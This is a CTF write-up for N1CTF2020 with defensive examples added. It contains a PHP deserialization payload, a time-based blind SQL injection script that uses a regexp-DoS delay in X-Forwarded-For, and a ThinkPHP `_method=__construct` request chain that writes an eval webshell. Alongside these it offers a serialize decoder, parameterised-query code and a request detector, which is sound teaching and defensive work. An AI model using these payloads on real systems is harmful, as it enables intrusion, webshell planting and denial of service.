N1CTF2020


Signin

 <?php
 
 class flag {
     public $ip;
     public $check;
 }
 
 class ip {
     public $ip;
 }
 
 $ip = new ip();
 $flag = new flag();
 $flag->ip = $ip;
 echo urlencode(serialize($flag));
 
 ?>
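
The snippet above only builds the payload; what makes the signin step work is that the server hands the `?input=` value to `unserialize()`, which instantiates whatever classes the string names. As an added example (not code from the challenge or this writeup), here is a small Python decoder for PHP's `serialize()` format that reports which classes a payload would instantiate, run on the payload above. The names `PhpObject`, `parse_php_serialized`, `instantiated_classes` and `disallowed_classes` are this example's own; on the PHP side the equivalent control is the `allowed_classes` option of `unserialize()`.

```python
# Added example, not code from the writeup: decode a PHP serialize() payload and
# list the classes it would instantiate. Only the tags in the Signin payload
# (O, a, s, i, b, d, N) are handled; any other tag raises, i.e. the check fails closed.
from dataclasses import dataclass, field
from typing import Any, Dict, List, Set, Tuple
from urllib.parse import unquote

# Constructed sample: the value the author's PHP snippet prints, as it travels in
# the ?input= query string, and its decoded form.
SAMPLE_QUERY_VALUE = (
    "O%3A4%3A%22flag%22%3A2%3A%7Bs%3A2%3A%22ip%22%3BO%3A2%3A%22ip%22%3A1%3A%7B"
    "s%3A2%3A%22ip%22%3BN%3B%7Ds%3A5%3A%22check%22%3BN%3B%7D"
)
SAMPLE_PAYLOAD = unquote(SAMPLE_QUERY_VALUE)


@dataclass
class PhpObject:
    class_name: str
    props: Dict[Any, Any] = field(default_factory=dict)


def _read_int(s: str, i: int) -> Tuple[int, int]:
    # decimal length/count starting at s[i]; returns (value, index after the ':')
    colon = s.index(":", i)
    return int(s[i:colon]), colon + 1


def _parse_pairs(s: str, j: int, count: int, into: Dict[Any, Any]) -> int:
    # `count` key;value pairs after '{', then the closing '}'
    for _ in range(count):
        key, j = _parse_value(s, j)
        value, j = _parse_value(s, j)
        into[key] = value
    if s[j] != "}":
        raise ValueError("expected '}' at %d" % j)
    return j + 1


def _parse_value(s: str, i: int) -> Tuple[Any, int]:
    tag = s[i]
    if tag == "N":                                # N;
        if s[i + 1] != ";":
            raise ValueError("bad null at %d" % i)
        return None, i + 2
    if tag in "ibd":                              # i:42;  b:1;  d:1.5;
        end = s.index(";", i)
        raw = s[i + 2:end]
        if tag == "i":
            return int(raw), end + 1
        if tag == "b":
            return raw == "1", end + 1
        return float(raw), end + 1
    if tag == "s":                                # s:<len>:"<bytes>";
        length, j = _read_int(s, i + 2)
        start, end = j + 1, j + 1 + length        # assumes ASCII: chars == bytes
        if s[end:end + 2] != '";':
            raise ValueError("bad string terminator at %d" % end)
        return s[start:end], end + 2
    if tag == "a":                                # a:<count>:{k;v;...}
        count, j = _read_int(s, i + 2)
        items: Dict[Any, Any] = {}
        return items, _parse_pairs(s, j + 1, count, items)
    if tag == "O":                                # O:<len>:"<class>":<count>:{...}
        name_len, j = _read_int(s, i + 2)
        name, j = s[j + 1:j + 1 + name_len], j + 1 + name_len
        if s[j:j + 2] != '":':
            raise ValueError("bad class name terminator at %d" % j)
        count, j = _read_int(s, j + 2)
        obj = PhpObject(name)
        return obj, _parse_pairs(s, j + 1, count, obj.props)
    raise ValueError("unsupported tag %r at %d" % (tag, i))


def parse_php_serialized(s: str) -> Any:
    value, end = _parse_value(s, 0)
    if end != len(s):
        raise ValueError("trailing data after position %d" % end)
    return value


def instantiated_classes(value: Any) -> List[str]:
    # class names unserialize() would construct, outermost first
    found: List[str] = []
    if isinstance(value, PhpObject):
        found.append(value.class_name)
        for v in value.props.values():
            found.extend(instantiated_classes(v))
    elif isinstance(value, dict):
        for v in value.values():
            found.extend(instantiated_classes(v))
    return found


def disallowed_classes(serialized: str, allowed: Set[str]) -> List[str]:
    # classes in the payload that are not on the allowlist, de-duplicated, in order
    seen: List[str] = []
    for name in instantiated_classes(parse_php_serialized(serialized)):
        if name not in allowed and name not in seen:
            seen.append(name)
    return seen


if __name__ == "__main__":
    print(SAMPLE_PAYLOAD)
    print(disallowed_classes(SAMPLE_PAYLOAD, allowed=set()))  # ['flag', 'ip']
```

Running it on the signin payload yields `['flag', 'ip']`: two application classes get constructed before any of the application's own code sees the request. The decoder is a triage tool, not a substitute for the server-side fix; with `unserialize($input, ['allowed_classes' => false])` (or an explicit list) PHP turns unknown classes into `__PHP_Incomplete_Class` instead of instantiating them, and a format such as JSON that cannot name classes at all avoids the problem outright.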

Next comes an injection. A Cartesian product can be used to produce the time delay, but it is very unstable and also crashes the machine.

 import requests
 import time
 # the deserialization payload from the Signin step, passed through ?input=
 url='http://101.32.205.189/?input=O:4:"flag":2:{s:2:"ip";O:2:"ip":1:{s:2:"ip";N;}s:5:"check";N;}'
 x=""
 # recover the key one character at a time, binary-searching its ASCII code;
 # a request that times out means the heavy regexp branch ran, i.e. the
 # comparison inside the injected if() was true
 for i in range(1,100):
     max = 130
     min = 30
     while max >=min:
         mid=(max+min)//2
         header = {"X-Forwarded-For": "'+if((ascii(substr((select key from n1key)," + str(i) + ",1))>" + str(mid) + "),(select concat(lpad(1,999999,'a'),lpad(1,999999,'a'),lpad(1,999999,'a'),lpad(1,999999,'a'),lpad(1,999999,'a'),lpad(1,999999,'a'),lpad(1,999999,'a'),lpad(1,999999,'a'),lpad(1,999999,'a'),lpad(1,999999,'a'),lpad(1,999999,'a'),lpad(1,999999,'a'),lpad(1,999999,'a'),lpad(1,999999,'a'),lpad(1,999999,'a'),lpad(1,999999,'a')) regexp '(a.*)+(a.*)+(a.*)+(a.*)+(a.*)+(a.*)+(a.*)+(a.*)+(a.*)+(a.*)+(a.*)+b'),1),'123')#"}
         t1 = time.time()
         try:
             r=requests.get(url=url,headers=header,timeout=3)
             # answered within the timeout: the character code is <= mid
             max = mid
             if max == mid == min:
                 x += chr(mid)
                 print(str(i) + ':' + x)
                 break
         except:
             t2=time.time()
             if((t2-t1)>3):
                 # timed out: the character code is > mid
                 min = mid + 1
             else:
                 # some other error before the timeout: treat as "not greater"
                 max=mid
             if max == mid == min:
                 x += chr(mid)
                 print(str(i) + ':' + x)
                 break
                 
 

After crashing the target machine a few times, I asked the challenge author; it turned out that `ipad` had been written as `1pad`, and they just gave out the flag.
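
The root cause of this step is the usual one: the value of `X-Forwarded-For` is spliced into SQL text. As an added example (not code from the challenge or this writeup), the following Python shows that pattern once unparameterised and once parameterised, plus a validation step for the header itself. SQLite stands in for the challenge's MySQL; the table, sample rows and function names are this example's own.

```python
# Added example, not code from the writeup: the "client IP from X-Forwarded-For goes
# into a query" pattern behind the injection above, shown unparameterised and then
# parameterised with header validation. SQLite stands in for the challenge's MySQL.
import ipaddress
import sqlite3
from typing import Optional

# Constructed sample data: three logged visitor addresses.
SAMPLE_VISITS = [("1.1.1.1",), ("10.0.0.2",), ("192.0.2.7",)]


def _demo_db() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE visits (ip TEXT NOT NULL)")
    conn.executemany("INSERT INTO visits VALUES (?)", SAMPLE_VISITS)
    return conn


def count_visits_unsafe(xff: str) -> int:
    """Vulnerable: the header value is spliced into the SQL text, so a quote in it
    changes the statement instead of being compared as data."""
    conn = _demo_db()
    row = conn.execute(f"SELECT count(*) FROM visits WHERE ip = '{xff}'").fetchone()
    return row[0]


def count_visits_safe(xff: str) -> int:
    """Parameterised: whatever the header contains is bound as one string value."""
    conn = _demo_db()
    row = conn.execute("SELECT count(*) FROM visits WHERE ip = ?", (xff,)).fetchone()
    return row[0]


def first_client_ip(xff: str) -> Optional[str]:
    """X-Forwarded-For is 'client, proxy1, proxy2, ...' and is entirely client-controlled;
    keep only the leftmost hop and accept it only if it parses as an IP address."""
    candidate = xff.split(",", 1)[0].strip()
    try:
        return str(ipaddress.ip_address(candidate))
    except ValueError:
        return None


def count_visits_hardened(xff: str) -> int:
    """Validate first, then query with a bound parameter."""
    ip = first_client_ip(xff)
    if ip is None:
        return 0  # a real handler would reject the request or fall back to REMOTE_ADDR
    return count_visits_safe(ip)


if __name__ == "__main__":
    probe = "9.9.9.9' OR '1'='1"  # constructed: a header whose quote breaks the literal
    print(count_visits_unsafe(probe))    # 3: the OR swallows the WHERE clause
    print(count_visits_safe(probe))      # 0: compared as one literal string
    print(count_visits_hardened(probe))  # 0: rejected by the IP check
```

Two practical notes. Only the leftmost `X-Forwarded-For` entry has any claim to being the client, and only when the header was set by a proxy you control; otherwise `REMOTE_ADDR` is the address to log. And the instability the author saw is the defender's signal too: regexp and Cartesian-product queries are cheap for the sender and expensive for the database, so a per-statement limit such as MySQL's `max_execution_time` bounds what one request can cost, and query latency spikes correlated with a single header value are worth alerting on.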

easy_tp5

POST[]=-1&method=POST&filter[]=phpinfo&_method=__construct

This shows phpinfo, which reveals disable_functions and open_basedir.

After finding that a shell could not be written using the array trick, audit the source code.

The module (template) creation routine can be invoked:

 _method=__construct&method=GET&filter[]=think\Build::module&server[]=1&get[]=../public/aaa

Tested locally: on Linux the following file can be written (on Windows this fails because of directory-name restrictions).

 _method=__construct&method=GET&filter[]=think\Build::module&server[]=1&get[]=../public/aaa?<?php phpinfo();?>

Accessing it directly produces an error. It turned out that

 _method=__construct&method=POST&POST=index//../../public/a?><?php eval($_POST['a']);?>&filter[]=think\Build::module

works: with `//` acting as a comment, the error no longer occurs.

Visit http://101.32.184.39/a%3F%3E%3C%3Fphp%20eval%28%24_POST%5B%27a%27%5D%29%3B%3F%3E/controller/Index.php

Shell obtained. AntSword (蚁剑) plus a bypass script finishes it off in one go:

tac /flag
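
Every request in this chain shares three traits that are visible without knowing the framework: an `_method` override whose value is not an HTTP verb, a client-supplied `filter[]` parameter, and `../` or a PHP open tag inside a parameter value. As an added example (not code from the challenge or this writeup), the following Python applies those checks to request bodies; the sample bodies are the ones shown above (the second with the `phpinfo()` body from the local test) plus a benign form-method override, and the function and constant names are this example's own.

```python
# Added example, not code from the writeup: a request-body check for the
# ThinkPHP-style chain above (an _method override that is not an HTTP verb, a
# client-supplied filter[] parameter, path traversal and PHP tags in values).
from typing import List, Tuple
from urllib.parse import unquote_plus

# Method override exists so HTML forms can send verbs they cannot express; a PHP
# method name such as __construct has no business there.
ALLOWED_METHOD_OVERRIDES = {"GET", "POST", "PUT", "DELETE", "PATCH", "HEAD", "OPTIONS"}


def _split_form(body: str) -> List[Tuple[str, str]]:
    # application/x-www-form-urlencoded text -> ordered (name, value) pairs,
    # keeping repeated names so that []-style parameters are seen individually
    pairs: List[Tuple[str, str]] = []
    for part in body.split("&"):
        if not part:
            continue
        name, _, value = part.partition("=")
        pairs.append((unquote_plus(name), unquote_plus(value)))
    return pairs


def suspicious_params(body: str) -> List[str]:
    findings: List[str] = []
    for name, value in _split_form(body):
        base = name.split("[", 1)[0]          # "filter[]" -> "filter"
        if base == "_method" and value.upper() not in ALLOWED_METHOD_OVERRIDES:
            findings.append(f"_method override to non-verb {value!r}")
        if base == "filter":
            findings.append(f"client-supplied filter {value!r}")
        if "../" in value or "..\\" in value:
            findings.append(f"path traversal in {name!r}: {value!r}")
        if "<?php" in value.lower():
            findings.append(f"PHP open tag in {name!r}")
    return findings


# Constructed samples: the two request bodies from the writeup (the second with the
# phpinfo() body used in the local test) and a benign form-method override.
SAMPLE_BODIES = {
    "phpinfo": "POST[]=-1&method=POST&filter[]=phpinfo&_method=__construct",
    "write_file": ("_method=__construct&method=POST"
                   "&POST=index//../../public/a?><?php phpinfo();?>"
                   "&filter[]=think\\Build::module"),
    "benign": "_method=PUT&id=5&name=alice",
}

if __name__ == "__main__":
    for label, body in SAMPLE_BODIES.items():
        print(label, suspicious_params(body))
```

The check is deliberately framework-agnostic: it flags the shape of the request rather than a specific gadget, so it still fires when the callable in `filter[]` changes. The matching server-side controls are to restrict `_method` to the verbs in the allowlist, never to accept `filter` (or any other request-object property) from the client, and to keep the framework patched so that `__construct` cannot be reached through the override at all.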

 

Docker_manager

To be added.


